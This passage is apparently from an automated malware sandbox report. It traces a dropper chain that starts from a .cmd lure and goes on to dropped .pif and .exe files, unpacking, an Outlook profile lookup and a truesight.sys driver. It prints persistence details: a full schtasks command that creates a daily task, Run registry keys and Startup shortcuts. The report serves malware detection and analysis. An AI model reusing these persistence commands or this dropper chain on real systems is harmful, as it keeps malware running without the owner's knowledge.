                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ????.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: tquery.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptdll.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppwmi.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: slc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppcext.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winscard.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: devobj.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptbase.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: msasn1.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textshaping.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textinputframework.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coreuicomponents.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coremessaging.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ntmarta.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coremessaging.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: PO_KB#67897.cmdStatic file information: File size 1367515 > 1048576
                        Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000015.00000002.2531569622.0000000031ACA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbIL source: rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbXa source: rpkhzpuO.pif, 0000001A.00000003.2462367771.000000002B3DC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217D1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000893000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000992000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000963000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 8.2.rpkhzpuO.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 21.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 26.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 31.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 8.2.rpkhzpuO.pif.400000.3.unpack
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 21.2.rpkhzpuO.pif.400000.0.unpack
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 26.2.rpkhzpuO.pif.400000.0.unpack
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 31.2.rpkhzpuO.pif.400000.0.unpack
                        Source: Yara matchFile source: 4.2.x.exe.22065a8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.x.exe.22065a8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.x.exe.2b20000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2209421224.0000000001420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000001.2174375803.0000000001420000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2176575888.0000000002206000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2259800821.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: rpkhzpuO.pif.4.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B38798
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B4C2FC push 02B4C367h; ret 4_2_02B4C35F
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B232FC push eax; ret 4_2_02B23338
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2635A push 02B263B7h; ret 4_2_02B263AF
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2635C push 02B263B7h; ret 4_2_02B263AF
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B4C0AC push 02B4C125h; ret 4_2_02B4C11D
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B4C1F8 push 02B4C288h; ret 4_2_02B4C280
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B4C144 push 02B4C1ECh; ret 4_2_02B4C1E4
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B386B8 push 02B386FAh; ret 4_2_02B386F2
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B26736 push 02B2677Ah; ret 4_2_02B26772
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B26738 push 02B2677Ah; ret 4_2_02B26772
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2C4EC push ecx; mov dword ptr [esp], edx4_2_02B2C4F1
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3E5AC push ecx; mov dword ptr [esp], edx4_2_02B3E5B1
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2D520 push 02B2D54Ch; ret 4_2_02B2D544
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2CA82 push 02B2CCF2h; ret 4_2_02B2CCEA
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B4BB64 push 02B4BD8Ch; ret 4_2_02B4BD84
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2CB6C push 02B2CCF2h; ret 4_2_02B2CCEA
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3788C push 02B37909h; ret 4_2_02B37901
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B368C6 push 02B36973h; ret 4_2_02B3696B
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B368C8 push 02B36973h; ret 4_2_02B3696B
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B38910 push 02B38948h; ret 4_2_02B38940
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3A917 push 02B3A950h; ret 4_2_02B3A948
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3A918 push 02B3A950h; ret 4_2_02B3A948
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3890E push 02B38948h; ret 4_2_02B38940
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B32EE0 push 02B32F56h; ret 4_2_02B32F4E
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B32FEB push 02B33039h; ret 4_2_02B33031
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B32FEC push 02B33039h; ret 4_2_02B33031
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B35DFC push ecx; mov dword ptr [esp], edx4_2_02B35DFE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0041C40C push cs; iretd 8_2_0041C4E2
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_00423149 push eax; ret 8_2_00423179
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_0041C50E push cs; iretd 8_2_0041C4E2
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_2_004231C8 push eax; ret 8_2_00423179
                        Source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                        Source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                        Source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                        Source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Microsofts.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02B3A954
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
